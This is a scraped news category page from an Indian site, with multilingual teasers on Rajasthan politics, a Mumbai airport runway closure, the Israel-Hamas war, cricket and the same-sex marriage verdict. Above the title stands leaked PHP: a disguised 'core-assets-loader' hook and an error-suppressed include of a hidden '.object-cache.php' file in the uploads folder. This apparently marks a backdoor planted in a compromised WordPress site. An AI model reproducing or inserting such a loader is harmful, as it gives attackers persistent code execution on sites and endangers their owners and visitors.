add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); समाचार – SOCH INDIA
Menu

एक मशहूर बॉलीवुड फिल्म का गीत है, जादूगर का जादू..हाथों का कमाल है..करते हो तुम कैसे सबका ये सवाल है. कई बार यही सवाल राजस्थान के राजनीतिक गलियारों में अशोक गहलोत के प्रशंसक और उनके विरोधी उनसे पूछते रहते हैं. वैसे भी जादूगर फैमिली से आने वाले अशोक गहलोत...

Read More

Mehreen Pirzada, an actor and model who recently made her OTT debut in Milan Luthria’s web series ‘Sultan of Delhi,’ has slammed a section of the mainstream media and social media for describing marital rape scene in the series as a “sex scene.” The actress who plays the character...

Read More

युवराज सिंगने २००७ साली झालेल्या टी-२० वर्ल्ड कपमध्ये धडाकेबाज फटकेबाजी केली होती. इंग्लंडविरुद्धच्या सामन्यात युवराजने स्टुअर्ट ब्रॉडला सलग सहा षटकार लगावले होते. या सामन्यात युवराज सिंगने १२ चेंडूंत अर्धशतक झळकावण्याचा विश्वविक्रम आपल्या नावावर केला होता. पण हा वर्ल्ड रेकॉर्ड हा फक्त एकाच चेंडूने मोडला गेला आहे. कारण भारताच्या खेळाडूने...

Read More

देश
मुंबईहून जयपूरला जाणारे सुमारे 140 प्रवासी काही तांत्रिक कारणामुळे मुंबई विमानतळावर (Mumbai Airrport) लॉक झाले आहेत. एका प्रवाशाने दावा केला आहे की ते मुंबईहून जयपूरला जाणाऱ्या एअर एशियाच्या सकाळी 6:15 च्या फ्लाइटमध्ये जाण्यासाठी आले होते पण अजूनही मुंबई विमानतळावर थांबून आहेत. प्रवाशांचा दावा आहे की ते विमान आणि विमानतळाच्या मध्यभागी असलेल्या पॅसेज वेमध्ये लॉक केले गेले आहेत. मिळालेल्या माहितीनुसार, विमानामध्ये काही तांत्रिक त्रुटी असल्याचा विमानतळ प्राधिकरणाचा दावा आहे. परंतु ते कारण स्पष्ट करण्यास किंवा दुसर्‍या विमानाची व्यवस्था करण्यास तयार नाहीत.अनेक प्रवाशांच्या महत्त्वाच्या बैठका होत्या तर एकाला वडिलांच्या अंत्यविधीला हजर राहायचे होते. पण गेले पाच ते सहा तास विमानतळावर थांबावे लागले आहे. छत्रपती शिवाजी महाराज आंतरराष्ट्रीय विमानतळावरील दोन्ही धावपट्ट्या पावसाळ्यानंतर नियोजित देखभाल-दुरुस्तीसाठी आज बंद ठेवण्याचा निर्णय विमानतळ प्रशासनाने घेतला आहे. सकाळी 11 सायंकाळी पाच या वेळेत धावपट्टींची दुरुस्ती केली जाणार आहे. त्यामुळे सुमारे अंदाजित 350 अधिक विमानसेवांना फटका बसणार आहे. सहा तास एकही विमान उडणार नाही मुंबई आंतरराष्ट्रीय विमानतळ आज सहा तासांसाठी तात्पुरतं बंद करण्यात येणार आहे. मुंबई विमानतळ तात्पुरतं बंद करणे सीएसएमआयएच्‍या वार्षिक प्रतिबंधात्मक देखभालीसाठी आहे. अधिकार्‍यांनी दिलेल्या माहितीनुसार, मुंबई विमानतळावरील या नियोजित तात्पुरत्या बंदचा प्राथमिक उद्देश विमानतळाच्या पायाभूत सुविधा सुधारून त्यांचा सर्वोत्तम दर्जा राखण्यासाठी आहे. या काळात आवश्यक असलेली दुरुस्ती आणि देखभाल कामे करण्यात येतील. एअरमेनला नोटीस (NOTAM) एअरलाइन्स आणि इतर संबंधितांना सहा महिने अगोदर जारी करण्यात आली आहे. बंदचं कारण काय? मुंबई विमानतळावरील दोन्ही धावपट्टीवर देखभाल दुरुस्तीचे काम केले जाणार आहे. विमानतळ ऑपरेटरच्या निवेदनानुसार सांगण्यात आलं आहे की, “छत्रपती शिवाजी महाराज आंतरराष्ट्रीय विमानतळाच्या (CSMIA) पावसाळ्यानंतरच्या सर्वसमावेशक धावपट्टी देखभाल योजनेचा एक भाग म्हणून, दोन्ही रनवे RWY 09/27 आणि RWY 14/32 हे 17 ऑक्टोबर रोजी सकाळी 11:00 वाजता ते 17:00 वाजेपर्यंत तात्पुरते नॉन-ऑपरेशनल राहणार आहेत

United States President Joe Biden will on Wednesday visit Israel for talks with Israeli Prime Minister Benjamin Netanyahu and show his support for Israel’s right to defend itself, Secretary of State Antony Blinken said on Tuesday. Blinken added that Biden will reaffirm solidarity with Israel, which has widely been...

Read More

इजरायल और फलस्तीन में जारी संघर्ष के बीच मिलिटेंट ग्रुप हमास एक बार फिर चर्चाओं में है. 7 अक्टूबर, 2023 को ताबड़तोड़ रॉकेट दागकर उसने इजरायल और फलस्तीन की सालों पुरानी जंग फिर छेड़ दी. हमास के हमलों की जवाबी कार्रवाई में इजरायल ने भी अपने एक से बढ़कर...

Read More

The Supreme Court is set to deliver its verdict today on a batch of petitions seeking legal recognition for same-sex marriage in India. The petitions were heard by a five-judge constitution bench headed by Chief Justice D Y Chandrachud for 10 days and the judgement was reserved on May...

Read More

In a harrowing incident, a Muslim woman and her six-year-old son, believed to be Palestinian-American, were brutally stabbed multiple times in an attack linked to the ongoing conflict between Israel and Hamas. The child tragically succumbed to his injuries after being stabbed 26 times, while the 32-year-old woman, likely...

Read More

In the wake of continued hostilities between Israel and Hamas, Israeli Prime Minister Benjamin Netanyahu has declared his resolve to defeat the Palestinian armed group Hamas, which launched attacks on Israeli border areas, resulting in the loss of hundreds of innocent lives on October 7. Speaking about the ongoing...

Read More

On the eighth day of the Israel-Hamas conflict, the Israeli Defense Forces initiated a massive ground operation in Gaza. During an overnight airstrike, the Israel Air Force reported the successful elimination of Murad Abu Murad, the leader of Hamas’s Air Force. The strike specifically targeted a headquarters overseeing Hamas’s...

Read More

क्रिकेट विश्व कप में भारत और पाकिस्तान के बीच मैच से पहले पाकिस्तान क्रिकेट टीम के जोरदार स्वागत के वायरल वीडियो पर शिवसेना (यूबीटी) ने सख्त प्रतिक्रिया दी है. पार्टी के सांसद संजय राउत ने शनिवार को सत्तारूढ़ बीजेपी पर तीखा कटाक्ष करते हुए कहा, “यह केवल गुजरात में...

Read More